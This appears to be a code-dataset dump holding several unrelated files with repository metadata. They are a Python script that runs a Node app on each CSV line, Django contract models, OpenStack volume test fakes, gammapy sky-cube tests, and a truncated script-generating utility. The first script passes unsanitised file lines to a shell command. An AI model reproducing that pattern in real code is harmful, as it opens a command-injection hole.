e7c3e4fdfbf9f7d8398d91ce0c5c028dfc685f3a
|
[
"MIT"
] | null | null | null |
import subprocess
f = open("app_list.csv","r")
lines = f.readlines()
for line in lines:
print(line.strip())
command = "node app.js " + line.strip();
display = subprocess.run(command, stdout=subprocess.PIPE, shell=True)
# display = subprocess.run(["sudo","-u",username,"tshark", "-r", pcapname, "-Y", display_filter[sp]], stdout=subprocess.PIPE)
# display_in_list = display.stdout.split()
| 31.076923
| 126
| 0.680693
| 55
| 404
| 4.927273
| 0.6
| 0.066421
| 0.147601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133663
| 404
| 13
| 127
| 31.076923
| 0.774286
| 0.408416
| 0
| 0
| 0
| 0
| 0.105485
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903ed7280655c7a88f5f5eb4e9a427e26a17d12e
| 4,035
|
py
|
Python
|
contracts/models.py
|
sivanagarajumolabanti/IPFS
|
9ae01ce09c97660ca312aad7d612bbc8eb8146e7
|
[
"MIT"
] | 1
|
2019-08-27T04:20:06.000Z
|
2019-08-27T04:20:06.000Z
|
contracts/models.py
|
sivanagarajumolabanti/IPFS
|
9ae01ce09c97660ca312aad7d612bbc8eb8146e7
|
[
"MIT"
] | null | null | null |
contracts/models.py
|
sivanagarajumolabanti/IPFS
|
9ae01ce09c97660ca312aad7d612bbc8eb8146e7
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.models import User
from django.db import models
from django.utils.timezone import now
class Vendor(models.Model):
user = models.ManyToManyField(User)
name = models.CharField(max_length=30, null=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.name
class File(models.Model):
file = models.FileField(upload_to='documents/')
def __str__(self):
return self.file.name
class Contract(models.Model):
approved = 1
pending = 0
vendor = 2
STATUS_CHOICES = (
(approved, 'Approved'),
(vendor, 'Vendors Approved'),
(pending, 'Pending'),
)
smart_choices = ((1, 'Yes'), (0, 'No'))
name = models.CharField(max_length=255)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
vendor = models.ForeignKey(Vendor, on_delete=models.CASCADE, null=True)
amount = models.DecimalField(null=True, max_digits=10, decimal_places=2)
installments = models.IntegerField(null=True)
amount_paid = models.DecimalField(null=True, max_digits=10, decimal_places=2)
status = models.CharField(max_length=2,
choices=STATUS_CHOICES, default=0, null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
validity = models.DateField(default=now())
comments = models.TextField(null=True, blank=True)
smart_contract = models.BooleanField(max_length=2, choices=smart_choices, default=0)
files = models.ManyToManyField(File, related_name='files')
hash_key = models.CharField(max_length=255, blank=True)
def __str__(self):
return self.name
class Approvals(models.Model):
LEVEL_CHOICES = (
('0', 'Contract'),
('1', 'Sow'),
('2', 'Invoice'),
)
Approvals = ((1, 'Yes'), (0, 'No'))
contracts = models.ForeignKey(Contract, on_delete=models.CASCADE, null=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
status = models.BooleanField(max_length=2, choices=Approvals, default=0)
comments = models.TextField(null=True, blank=True)
contract_level = models.CharField(max_length=2,
choices=LEVEL_CHOICES, default=0, null=True, blank=True)
def __str__(self):
return self.contracts.name
class DocuSign(models.Model):
contract = models.ForeignKey(Contract, on_delete=models.CASCADE, null=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
envelope = models.CharField(max_length=255, null=True, blank=True)
document_name = models.CharField(max_length=255, null=True, blank=True)
files = models.FileField(upload_to='media/', null=True, blank=True)
def __str__(self):
return self.contract.name
class IPFSModel(models.Model):
name = models.CharField(max_length=255)
hashkey = models.CharField(max_length=255)
size = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Sow(models.Model):
contract = models.ForeignKey(Contract, on_delete=models.CASCADE,null=True)
smart_choices = ((1, 'Yes'), (0, 'No'))
smart_contract = models.BooleanField(max_length=2, choices=smart_choices, default=0)
file = models.FileField(upload_to='documents/')
def __str__(self):
return self.contract.name
class Invoice(models.Model):
amount = models.DecimalField(null=True, max_digits=10, decimal_places=2)
contract = models.ForeignKey(Contract, on_delete=models.CASCADE,null=True)
file = models.FileField(upload_to='documents/')
user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
smart_choices = (('1', 'Declined'), ('0', 'Approved'), ('2', 'Created'))
status = models.CharField(max_length=2, choices=smart_choices, default='2', null=True, blank=True)
def __str__(self):
return self.contract.name
| 36.351351
| 102
| 0.691698
| 510
| 4,035
| 5.292157
| 0.172549
| 0.065209
| 0.073361
| 0.097814
| 0.727677
| 0.67877
| 0.596147
| 0.513524
| 0.482401
| 0.426454
| 0
| 0.017841
| 0.180421
| 4,035
| 110
| 103
| 36.681818
| 0.798307
| 0
| 0
| 0.430233
| 0
| 0
| 0.033457
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.034884
| 0.093023
| 0.883721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9040b2be08c9dcba639583373b5f0c4c01de3091
| 13,242
|
py
|
Python
|
openstackclient/tests/unit/volume/v3/fakes.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 262
|
2015-01-29T20:10:49.000Z
|
2022-03-23T01:59:23.000Z
|
openstackclient/tests/unit/volume/v3/fakes.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 5
|
2015-01-21T02:37:35.000Z
|
2021-11-23T02:26:00.000Z
|
openstackclient/tests/unit/volume/v3/fakes.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 194
|
2015-01-08T07:39:27.000Z
|
2022-03-30T13:51:23.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from unittest import mock
import uuid
from cinderclient import api_versions
from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes
from openstackclient.tests.unit import utils
from openstackclient.tests.unit.volume.v2 import fakes as volume_v2_fakes
class FakeVolumeClient(object):
def __init__(self, **kwargs):
self.auth_token = kwargs['token']
self.management_url = kwargs['endpoint']
self.api_version = api_versions.APIVersion('3.0')
self.attachments = mock.Mock()
self.attachments.resource_class = fakes.FakeResource(None, {})
self.groups = mock.Mock()
self.groups.resource_class = fakes.FakeResource(None, {})
self.group_snapshots = mock.Mock()
self.group_snapshots.resource_class = fakes.FakeResource(None, {})
self.group_types = mock.Mock()
self.group_types.resource_class = fakes.FakeResource(None, {})
self.messages = mock.Mock()
self.messages.resource_class = fakes.FakeResource(None, {})
self.volumes = mock.Mock()
self.volumes.resource_class = fakes.FakeResource(None, {})
self.volume_types = mock.Mock()
self.volume_types.resource_class = fakes.FakeResource(None, {})
class TestVolume(utils.TestCommand):
def setUp(self):
super().setUp()
self.app.client_manager.volume = FakeVolumeClient(
endpoint=fakes.AUTH_URL,
token=fakes.AUTH_TOKEN
)
self.app.client_manager.identity = identity_fakes.FakeIdentityv3Client(
endpoint=fakes.AUTH_URL,
token=fakes.AUTH_TOKEN
)
self.app.client_manager.compute = compute_fakes.FakeComputev2Client(
endpoint=fakes.AUTH_URL,
token=fakes.AUTH_TOKEN,
)
# TODO(stephenfin): Check if the responses are actually the same
FakeVolume = volume_v2_fakes.FakeVolume
FakeVolumeType = volume_v2_fakes.FakeVolumeType
class FakeVolumeGroup:
"""Fake one or more volume groups."""
@staticmethod
def create_one_volume_group(attrs=None):
"""Create a fake group.
:param attrs: A dictionary with all attributes of group
:return: A FakeResource object with id, name, status, etc.
"""
attrs = attrs or {}
group_type = attrs.pop('group_type', None) or uuid.uuid4().hex
volume_types = attrs.pop('volume_types', None) or [uuid.uuid4().hex]
# Set default attribute
group_info = {
'id': uuid.uuid4().hex,
'status': random.choice([
'available',
]),
'availability_zone': f'az-{uuid.uuid4().hex}',
'created_at': '2015-09-16T09:28:52.000000',
'name': 'first_group',
'description': f'description-{uuid.uuid4().hex}',
'group_type': group_type,
'volume_types': volume_types,
'volumes': [f'volume-{uuid.uuid4().hex}'],
'group_snapshot_id': None,
'source_group_id': None,
'project_id': f'project-{uuid.uuid4().hex}',
}
# Overwrite default attributes if there are some attributes set
group_info.update(attrs)
group = fakes.FakeResource(
None,
group_info,
loaded=True)
return group
@staticmethod
def create_volume_groups(attrs=None, count=2):
"""Create multiple fake groups.
:param attrs: A dictionary with all attributes of group
:param count: The number of groups to be faked
:return: A list of FakeResource objects
"""
groups = []
for n in range(0, count):
groups.append(FakeVolumeGroup.create_one_volume_group(attrs))
return groups
class FakeVolumeGroupSnapshot:
"""Fake one or more volume group snapshots."""
@staticmethod
def create_one_volume_group_snapshot(attrs=None, methods=None):
"""Create a fake group snapshot.
:param attrs: A dictionary with all attributes
:param methods: A dictionary with all methods
:return: A FakeResource object with id, name, description, etc.
"""
attrs = attrs or {}
# Set default attribute
group_snapshot_info = {
'id': uuid.uuid4().hex,
'name': f'group-snapshot-{uuid.uuid4().hex}',
'description': f'description-{uuid.uuid4().hex}',
'status': random.choice(['available']),
'group_id': uuid.uuid4().hex,
'group_type_id': uuid.uuid4().hex,
'project_id': uuid.uuid4().hex,
}
# Overwrite default attributes if there are some attributes set
group_snapshot_info.update(attrs)
group_snapshot = fakes.FakeResource(
None,
group_snapshot_info,
methods=methods,
loaded=True)
return group_snapshot
@staticmethod
def create_volume_group_snapshots(attrs=None, count=2):
"""Create multiple fake group snapshots.
:param attrs: A dictionary with all attributes of group snapshot
:param count: The number of group snapshots to be faked
:return: A list of FakeResource objects
"""
group_snapshots = []
for n in range(0, count):
group_snapshots.append(
FakeVolumeGroupSnapshot.create_one_volume_group_snapshot(attrs)
)
return group_snapshots
class FakeVolumeGroupType:
"""Fake one or more volume group types."""
@staticmethod
def create_one_volume_group_type(attrs=None, methods=None):
"""Create a fake group type.
:param attrs: A dictionary with all attributes of group type
:param methods: A dictionary with all methods
:return: A FakeResource object with id, name, description, etc.
"""
attrs = attrs or {}
# Set default attribute
group_type_info = {
'id': uuid.uuid4().hex,
'name': f'group-type-{uuid.uuid4().hex}',
'description': f'description-{uuid.uuid4().hex}',
'is_public': random.choice([True, False]),
'group_specs': {},
}
# Overwrite default attributes if there are some attributes set
group_type_info.update(attrs)
group_type = fakes.FakeResource(
None,
group_type_info,
methods=methods,
loaded=True)
return group_type
@staticmethod
def create_volume_group_types(attrs=None, count=2):
"""Create multiple fake group types.
:param attrs: A dictionary with all attributes of group type
:param count: The number of group types to be faked
:return: A list of FakeResource objects
"""
group_types = []
for n in range(0, count):
group_types.append(
FakeVolumeGroupType.create_one_volume_group_type(attrs)
)
return group_types
class FakeVolumeMessage:
"""Fake one or more volume messages."""
@staticmethod
def create_one_volume_message(attrs=None):
"""Create a fake message.
:param attrs: A dictionary with all attributes of message
:return: A FakeResource object with id, name, status, etc.
"""
attrs = attrs or {}
# Set default attribute
message_info = {
'created_at': '2016-02-11T11:17:37.000000',
'event_id': f'VOLUME_{random.randint(1, 999999):06d}',
'guaranteed_until': '2016-02-11T11:17:37.000000',
'id': uuid.uuid4().hex,
'message_level': 'ERROR',
'request_id': f'req-{uuid.uuid4().hex}',
'resource_type': 'VOLUME',
'resource_uuid': uuid.uuid4().hex,
'user_message': f'message-{uuid.uuid4().hex}',
}
# Overwrite default attributes if there are some attributes set
message_info.update(attrs)
message = fakes.FakeResource(
None,
message_info,
loaded=True)
return message
@staticmethod
def create_volume_messages(attrs=None, count=2):
"""Create multiple fake messages.
:param attrs: A dictionary with all attributes of message
:param count: The number of messages to be faked
:return: A list of FakeResource objects
"""
messages = []
for n in range(0, count):
messages.append(FakeVolumeMessage.create_one_volume_message(attrs))
return messages
@staticmethod
def get_volume_messages(messages=None, count=2):
"""Get an iterable MagicMock object with a list of faked messages.
If messages list is provided, then initialize the Mock object with the
list. Otherwise create one.
:param messages: A list of FakeResource objects faking messages
:param count: The number of messages to be faked
:return An iterable Mock object with side_effect set to a list of faked
messages
"""
if messages is None:
messages = FakeVolumeMessage.create_messages(count)
return mock.Mock(side_effect=messages)
class FakeVolumeAttachment:
"""Fake one or more volume attachments."""
@staticmethod
def create_one_volume_attachment(attrs=None):
"""Create a fake volume attachment.
:param attrs: A dictionary with all attributes of volume attachment
:return: A FakeResource object with id, status, etc.
"""
attrs = attrs or {}
attachment_id = uuid.uuid4().hex
volume_id = attrs.pop('volume_id', None) or uuid.uuid4().hex
server_id = attrs.pop('instance', None) or uuid.uuid4().hex
# Set default attribute
attachment_info = {
'id': attachment_id,
'volume_id': volume_id,
'instance': server_id,
'status': random.choice([
'attached',
'attaching',
'detached',
'reserved',
'error_attaching',
'error_detaching',
'deleted',
]),
'attach_mode': random.choice(['ro', 'rw']),
'attached_at': '2015-09-16T09:28:52.000000',
'detached_at': None,
'connection_info': {
'access_mode': 'rw',
'attachment_id': attachment_id,
'auth_method': 'CHAP',
'auth_password': 'AcUZ8PpxLHwzypMC',
'auth_username': '7j3EZQWT3rbE6pcSGKvK',
'cacheable': False,
'driver_volume_type': 'iscsi',
'encrypted': False,
'qos_specs': None,
'target_discovered': False,
'target_iqn':
f'iqn.2010-10.org.openstack:volume-{attachment_id}',
'target_lun': '1',
'target_portal': '192.168.122.170:3260',
'volume_id': volume_id,
},
}
# Overwrite default attributes if there are some attributes set
attachment_info.update(attrs)
attachment = fakes.FakeResource(
None,
attachment_info,
loaded=True)
return attachment
@staticmethod
def create_volume_attachments(attrs=None, count=2):
"""Create multiple fake volume attachments.
:param attrs: A dictionary with all attributes of volume attachment
:param count: The number of volume attachments to be faked
:return: A list of FakeResource objects
"""
attachments = []
for n in range(0, count):
attachments.append(
FakeVolumeAttachment.create_one_volume_attachment(attrs))
return attachments
@staticmethod
def get_volume_attachments(attachments=None, count=2):
"""Get an iterable MagicMock object with a list of faked volumes.
If attachments list is provided, then initialize the Mock object with
the list. Otherwise create one.
:param attachments: A list of FakeResource objects faking volume
attachments
:param count: The number of volume attachments to be faked
:return An iterable Mock object with side_effect set to a list of faked
volume attachments
"""
if attachments is None:
attachments = FakeVolumeAttachment.create_volume_attachments(count)
return mock.Mock(side_effect=attachments)
| 33.953846
| 79
| 0.614258
| 1,493
| 13,242
| 5.320831
| 0.170127
| 0.026057
| 0.034743
| 0.02719
| 0.530841
| 0.468907
| 0.364552
| 0.300101
| 0.260196
| 0.201158
| 0
| 0.017726
| 0.292781
| 13,242
| 389
| 80
| 34.041131
| 0.830539
| 0.280849
| 0
| 0.232143
| 0
| 0
| 0.138629
| 0.049956
| 0
| 0
| 0
| 0.002571
| 0
| 1
| 0.0625
| false
| 0.004464
| 0.040179
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9040cb412be761146b6669d9fd4eade5a3ac0512
| 12,287
|
py
|
Python
|
gammapy/cube/tests/test_core.py
|
grburgess/gammapy
|
609e460698caca7223afeef5e71826c7b32728d1
|
[
"BSD-3-Clause"
] | 3
|
2019-01-28T12:21:14.000Z
|
2019-02-10T19:58:07.000Z
|
gammapy/cube/tests/test_core.py
|
grburgess/gammapy
|
609e460698caca7223afeef5e71826c7b32728d1
|
[
"BSD-3-Clause"
] | null | null | null |
gammapy/cube/tests/test_core.py
|
grburgess/gammapy
|
609e460698caca7223afeef5e71826c7b32728d1
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from numpy.testing import assert_allclose
from astropy.coordinates import Angle
from astropy.tests.helper import pytest, assert_quantity_allclose
from astropy.units import Quantity
from astropy.wcs import WCS
from ...utils.testing import requires_dependency, requires_data
from ...datasets import FermiGalacticCenter
from ...image import make_header
from ...irf import EnergyDependentTablePSF
from ...spectrum.powerlaw import power_law_evaluate
from .. import SkyCube, compute_npred_cube, convolve_cube
@requires_data('gammapy-extra')
@requires_dependency('scipy')
class TestSkyCube(object):
def setup(self):
self.sky_cube = FermiGalacticCenter.diffuse_model()
assert self.sky_cube.data.shape == (30, 21, 61)
def test_init(self):
name = 'Axel'
data = self.sky_cube.data
wcs = self.sky_cube.wcs
energy = self.sky_cube.energy
sky_cube = SkyCube(name, data, wcs, energy)
assert sky_cube.data.shape == (30, 21, 61)
def test_read_write(self, tmpdir):
filename = str(tmpdir / 'sky_cube.fits')
self.sky_cube.writeto(filename)
sky_cube = SkyCube.read(filename)
assert sky_cube.data.shape == (30, 21, 61)
def test_pix2world(self):
# Corner pixel with index [0, 0, 0]
lon, lat, energy = self.sky_cube.pix2world(0, 0, 0)
assert_quantity_allclose(lon, Quantity(344.75, 'deg'))
assert_quantity_allclose(lat, Quantity(-5.25, 'deg'))
assert_quantity_allclose(energy, Quantity(50, 'MeV'))
def test_world2pix(self):
lon = Quantity(344.75, 'deg')
lat = Quantity(-5.25, 'deg')
energy = Quantity(50, 'MeV')
x, y, z = self.sky_cube.world2pix(lon, lat, energy)
assert_allclose((x, y, z), (0, 0, 0))
def test_pix2world2pix(self):
# Test round-tripping
pix = 2.2, 3.3, 4.4
world = self.sky_cube.pix2world(*pix)
pix2 = self.sky_cube.world2pix(*world)
assert_allclose(pix2, pix)
# Check array inputs
pix = [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]
world = self.sky_cube.pix2world(*pix)
pix2 = self.sky_cube.world2pix(*world)
assert_allclose(pix2, pix)
@pytest.mark.xfail
def test_flux_scalar(self):
# Corner pixel with index [0, 0, 0]
lon = Quantity(344.75, 'deg') # pixel 0
lat = Quantity(-5.25, 'deg') # pixel 0
energy = Quantity(50, 'MeV') # slice 0
actual = self.sky_cube.flux(lon, lat, energy)
expected = self.sky_cube.data[0, 0, 0]
assert_quantity_allclose(actual, expected)
# Galactic center position
lon = Quantity(0, 'deg') # beween pixel 11 and 12 in ds9 viewer
lat = Quantity(0, 'deg') # beween pixel 30 and 31 in ds9 viewer
energy = Quantity(528.9657943133443, 'MeV') # slice 10 in ds9 viewer
actual = self.sky_cube.flux(lon, lat, energy)
# Compute expected value by interpolating 4 neighbors
# Use data axis order: energy, lat, lon
# and remember that numpy starts counting at 0 whereas FITS start at 1
s = self.sky_cube.data
expected = s[9, 10:12, 29:31].mean()
# TODO: why are these currently inconsistent by a few % !?
# actual = 9.67254380e-07
# expected = 10.13733026e-07
assert_quantity_allclose(actual, expected)
def test_flux_mixed(self):
# Corner pixel with index [0, 0, 0]
lon = Quantity([344.75, 344.75], 'deg') # pixel 0 twice
lat = Quantity([-5.25, -5.25], 'deg') # pixel 0 twice
energy = Quantity(50, 'MeV') # slice 0
actual = self.sky_cube.flux(lon, lat, energy)
expected = self.sky_cube.data[0, 0, 0]
assert_quantity_allclose(actual, expected)
def test_flux_array(self):
pix = [2, 2], [3, 3], [4, 4]
world = self.sky_cube.pix2world(*pix)
actual = self.sky_cube.flux(*world)
expected = self.sky_cube.data[4, 3, 2]
# Quantity([3.50571123e-07, 2], '1 / (cm2 MeV s sr)')
assert_quantity_allclose(actual, expected)
def test_integral_flux_image(self):
# For a very small energy band the integral flux should be roughly
# differential flux times energy bin width
lon, lat, energy = self.sky_cube.pix2world(0, 0, 0)
denergy = 0.001 * energy
energy_band = Quantity([energy, energy + denergy])
dflux = self.sky_cube.flux(lon, lat, energy)
expected = dflux * denergy
actual = Quantity(self.sky_cube.integral_flux_image(energy_band).data[0, 0],
'1 / (cm2 s sr)')
assert_quantity_allclose(actual, expected, rtol=1e-3)
# Test a wide energy band
energy_band = Quantity([1, 10], 'GeV')
image = self.sky_cube.integral_flux_image(energy_band)
actual = image.data.sum()
# TODO: the reference result is not verified ... just pasted from the test output.
expected = 5.2481972772213124e-02
assert_allclose(actual, expected)
# Test integral flux for energy bands with units.
energy_band_check = Quantity([1000, 10000], 'MeV')
new_image = self.sky_cube.integral_flux_image(energy_band_check)
assert_allclose(new_image.data, image.data)
assert new_image.wcs.axis_type_names == ['GLON', 'GLAT']
# TODO: fix this test.
# It's currently failing. Dont' know which number (if any) is correct.
# E x: array(7.615363001210512e-05)
# E y: array(0.00015230870989335428)
@pytest.mark.xfail
def test_solid_angle(self):
actual = self.sky_cube.solid_angle[10][30]
expected = Quantity(self.sky_cube.wcs.wcs.cdelt[:-1].prod(), 'deg2')
assert_quantity_allclose(actual, expected, rtol=1e-4)
def test_coordinates(self):
coordinates = self.sky_cube.coordinates()
lon = coordinates.data.lon
lat = coordinates.data.lat
assert lon.shape == (21, 61)
assert lat.shape == (21, 61)
assert_allclose(lon[0, 0], Angle("344d45m00s"))
assert_allclose(lat[0, 0], Angle(" -5d15m00s"))
assert_allclose(lon[0, -1], Angle("14d45m00s"))
assert_allclose(lat[0, -1], Angle("-5d15m00s"))
assert_allclose(lon[-1, 0], Angle("344d45m00s"))
assert_allclose(lat[-1, 0], Angle("4d45m00s"))
assert_allclose(lon[-1, -1], Angle("14d45m00s"))
assert_allclose(lat[-1, -1], Angle("4d45m00s"))
@pytest.mark.xfail
@requires_dependency('scipy.interpolate.RegularGridInterpolator')
@requires_dependency('reproject')
def test_compute_npred_cube():
# A quickly implemented check - should be improved
filenames = FermiGalacticCenter.filenames()
sky_cube = SkyCube.read(filenames['diffuse_model'])
exposure_cube = SkyCube.read(filenames['exposure_cube'])
counts_cube = FermiGalacticCenter.counts()
energy_bounds = Quantity([10, 30, 100, 500], 'GeV')
sky_cube = sky_cube.reproject_to(exposure_cube)
npred_cube = compute_npred_cube(sky_cube,
exposure_cube,
energy_bounds)
expected_sum = counts_cube.data.sum()
actual_sum = np.nan_to_num(npred_cube.data).sum()
# Check npredicted is same order of magnitude of true counts
assert_allclose(expected_sum, actual_sum, rtol=1)
# PSF convolve the npred cube
psf = EnergyDependentTablePSF.read(FermiGalacticCenter.filenames()['psf'])
npred_cube_convolved = convolve_cube(npred_cube, psf, offset_max=Angle(3, 'deg'))
actual_convolved_sum = npred_cube_convolved.data.sum()
# Check sum is the same after convolution
assert_allclose(actual_sum, actual_convolved_sum, rtol=0.1)
# Test shape
expected = ((len(energy_bounds) - 1, exposure_cube.data.shape[1],
exposure_cube.data.shape[2]))
actual = npred_cube_convolved.data.shape
assert_allclose(actual, expected)
def make_test_cubes(energies, nxpix, nypix, binsz):
"""Makes exposure and spectral cube for tests.
Parameters
----------
energies : `~astropy.units.Quantity`
Quantity 1D array of energies of cube layers
nxpix : int
Number of pixels in x-spatial direction
nypix : int
Number of pixels in y-spatial direction
binsz : float
Spatial resolution of cube, in degrees per pixel
Returns
-------
exposure_cube : `~gammapy.sky_cube.SkyCube`
Cube of uniform exposure = 1 cm^2 s
sky_cube : `~gammapy.sky_cube.SkyCube`
Cube of differential fluxes in units of cm^-2 s^-1 GeV^-1 sr^-1
"""
header = make_header(nxpix, nypix, binsz)
header['NAXIS'] = 3
header['NAXIS3'] = len(energies)
header['CDELT3'] = 1
header['CRVAL3'] = 1
header['CRPIX3'] = 1
wcs = WCS(header)
data_array = np.ones((len(energies), 10, 10))
exposure_cube = SkyCube(data=Quantity(data_array, 'cm2 s'),
wcs=wcs, energy=energies)
flux = power_law_evaluate(energies.value, 1, 2, 1)
flux = Quantity(flux, '1/(cm2 s GeV sr)')
flux_array = np.zeros_like(data_array)
for i in np.arange(len(flux)):
flux_array[i] = flux.value[i] * data_array[i]
sky_cube = SkyCube(data=Quantity(flux_array, flux.unit),
wcs=wcs, energy=energies)
return exposure_cube, sky_cube
@requires_dependency('scipy.interpolate.RegularGridInterpolator')
@requires_dependency('reproject')
def test_analytical_npred_cube():
# Analytical check: g=2, N=1 gives int. flux 0.25 between 1 and 2
# (arbitrary units of energy).
# Exposure = 1, so solid angle only factor which varies.
# Result should be 0.5 * 1 * solid_angle_array from integrating analytically
energies = Quantity([1, 2], 'MeV')
exposure_cube, sky_cube = make_test_cubes(energies, 10, 10, 1)
solid_angle_array = exposure_cube.solid_angle
# Expected npred counts (so no quantity)
expected = 0.5 * solid_angle_array.value
# Integral resolution is 1 as this is a true powerlaw case
npred_cube = compute_npred_cube(sky_cube, exposure_cube,
energies, integral_resolution=1)
actual = npred_cube.data[0]
assert_allclose(actual, expected)
@requires_dependency('scipy.interpolate.RegularGridInterpolator')
@requires_dependency('reproject')
def test_convolve_cube():
filenames = FermiGalacticCenter.filenames()
sky_cube = SkyCube.read(filenames['diffuse_model'])
exposure_cube = SkyCube.read(filenames['exposure_cube'])
energy_bounds = Quantity([10, 30, 100, 500], 'GeV')
sky_cube = sky_cube.reproject_to(exposure_cube)
npred_cube = compute_npred_cube(sky_cube,
exposure_cube,
energy_bounds)
# PSF convolve the npred cube
psf = EnergyDependentTablePSF.read(FermiGalacticCenter.filenames()['psf'])
npred_cube_convolved = convolve_cube(npred_cube, psf, offset_max=Angle(5, 'deg'))
expected = npred_cube.data.sum()
actual = npred_cube_convolved.data.sum()
assert_allclose(actual, expected, rtol=1e-2)
@pytest.mark.xfail
@requires_dependency('scipy')
@requires_dependency('reproject')
def test_reproject_cube():
# TODO: a better test can probably be implemented here to avoid
# repeating code
filenames = FermiGalacticCenter.filenames()
sky_cube = SkyCube.read(filenames['diffuse_model'])
exposure_cube = SkyCube.read(filenames['exposure_cube'])
original_cube = Quantity(np.nan_to_num(sky_cube.data.value),
sky_cube.data.unit)
sky_cube = sky_cube.reproject_to(exposure_cube)
reprojected_cube = Quantity(np.nan_to_num(sky_cube.data.value),
sky_cube.data.unit)
# 0.5 degrees per pixel in diffuse model
# 2 degrees in reprojection reference
# sum of reprojected should be 1/16 of sum of original if flux-preserving
expected = 0.0625 * original_cube.sum()
actual = reprojected_cube.sum()
assert_quantity_allclose(actual, expected, rtol=1e-2)
| 39.763754
| 90
| 0.657524
| 1,631
| 12,287
| 4.786021
| 0.195586
| 0.050218
| 0.040866
| 0.025109
| 0.425826
| 0.358698
| 0.328593
| 0.298232
| 0.272483
| 0.248655
| 0
| 0.049698
| 0.231952
| 12,287
| 308
| 91
| 39.892857
| 0.777472
| 0.198258
| 0
| 0.343284
| 0
| 0
| 0.051192
| 0.012644
| 0
| 0
| 0
| 0.006494
| 0.179104
| 1
| 0.084577
| false
| 0
| 0.064677
| 0
| 0.159204
| 0.004975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90459d8bfe26d007178d66a09649931906768496
| 5,829
|
py
|
Python
|
web_app/ca_modules/make_utils.py
|
Lockers13/codagio
|
cfe9325cb3c207f7728db3c287439ce761ffea14
|
[
"MIT"
] | 2
|
2021-01-16T13:42:14.000Z
|
2021-03-03T19:36:47.000Z
|
web_app/ca_modules/make_utils.py
|
Lockers13/codagio
|
cfe9325cb3c207f7728db3c287439ce761ffea14
|
[
"MIT"
] | null | null | null |
web_app/ca_modules/make_utils.py
|
Lockers13/codagio
|
cfe9325cb3c207f7728db3c287439ce761ffea14
|
[
"MIT"
] | null | null | null |
### A module containing various utilities used at various points throughout the processes of submitting and analyzing problems ###
import os
import json
import subprocess
import hashlib
import sys
import random
import string
from .output_processor import process_output
from . import code_templates
def make_file(path, code, problem_data):
"""Function to create script that is used for verification and profiling purposes
Returns nothing, writes to disk"""
def write_prequel(file_obj):
for line in ctemps["IMPORTS"]:
file_obj.write("{0}\n".format(line))
file_obj.write("\n")
def write_sequel(file_obj, fname):
if input_type == "file":
if init_data is not None:
text_to_write = ctemps["TEMPLATE_CODE_FILE_WITH_DATA"]
else:
text_to_write = ctemps["TEMPLATE_CODE_FILE"]
elif input_type == "default": ### CHANGE 'auto' TO 'default' AFTER PROBLEM UPLOAD VIEW IS CLEANED !!!
if is_inputs:
if is_init_data:
text_to_write = ctemps["TEMPLATE_CODE_DEFAULT_WITH_INPUT_AND_DATA"]
else:
text_to_write = ctemps["TEMPLATE_CODE_DEFAULT"]
elif is_init_data:
text_to_write = ctemps["TEMPLATE_CODE_DEFAULT"]
for line in text_to_write:
if "template_function" in line:
line = line.replace("template_function", str(fname))
file_obj.write("{0}\n".format(line))
ctemps = code_templates.get_ctemp_dict()
program_text = code
input_type = list(problem_data["metadata"]["input_type"].keys())[0]
